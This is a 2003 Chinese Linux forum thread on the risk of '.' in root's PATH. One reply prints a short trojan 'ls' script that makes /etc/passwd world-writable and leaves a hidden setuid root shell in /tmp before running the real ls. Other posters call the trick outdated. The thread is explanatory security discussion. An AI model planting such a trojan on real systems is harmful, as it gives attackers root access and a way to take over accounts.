LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
楼主: kiron

窃取你的密码文件的小脚本

[复制链接]
发表于 2003-12-18 12:11:02 | 显示全部楼层
最初由 kiron 发表
若是root用户的PATH目录中.目录在/bin/目录前的话,


不太可能吧。哪有那么不小心的root。
发表于 2003-12-18 14:17:25 | 显示全部楼层
关键是你没法改root的环境变量,你观察一下root的搜索路径的顺序就知道了。你说得这个方法正如你说的比较老,以前发生这种情况是因为当前目录最优先执行,用./command才能执行当前目录程序,正是为了防止这种情况出现而制定的。
发表于 2003-12-18 19:12:38 | 显示全部楼层
这种办法都是几十年前的老东西了,现在的 root 那有把 ./ 加到 PATH 里的,开玩笑!再说了,你的 ls 后面没有把原来命令的参数传过去,那还不是一眼就被人看穿了。
发表于 2003-12-18 20:44:05 | 显示全部楼层
最初由 idkey 发表
这种办法都是几十年前的老东西了,现在的 root 那有把 ./ 加到 PATH 里的,开玩笑!再说了,你的 ls 后面没有把原来命令的参数传过去,那还不是一眼就被人看穿了。

发表于 2003-12-18 22:57:31 | 显示全部楼层
最初由 idkey 发表
这种办法都是几十年前的老东西了,现在的 root 那有把 ./ 加到 PATH 里的,开玩笑!


嘿嘿~~~~我就是这样的,看来我不是一般的笨阿。:p :p :p
发表于 2003-12-19 00:10:37 | 显示全部楼层
多数的用户都有在路径中包含"."的"恶习", ;) 这里有个比较OLD的脚本,
  1. #!/bin/sh
  2. if chmod 666 /etc/passwd >/dev/null 2>&1
  3.         then cp /bin/sh /tmp/.sh
  4.              chmod 4755 /tmp/.sh
  5. fi
  6. exec ls "$@"
复制代码
当用户在/tmp这个目录中执行ls的时候,执行的是上述的脚本,而不是实际的/bin/ls,但是最终还是执行了"ls",所以用户基本看不出什么异常,但是如果是root的话,就会把口令文件的权限设置成可写,并将shell cp到/tmp中保存成.sh,同时置setuserid位,
这就是可信路径中有"."的危险性~~,当然,这都是以前的linux版本出现的"漏洞",现在的系统这样拙劣的脚本是没用的,;)
 楼主| 发表于 2003-12-30 16:54:43 | 显示全部楼层
````
发表于 2003-12-30 17:28:30 | 显示全部楼层
kiron,我只是说我知道的而已,并没其他意思!
发表于 2003-12-30 22:33:47 | 显示全部楼层
我也是,我是耍着鬼脸说的,kiron兄别介意。。。。
发表于 2003-12-31 10:40:58 | 显示全部楼层
其实都没什么,都没人说你怎么了?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表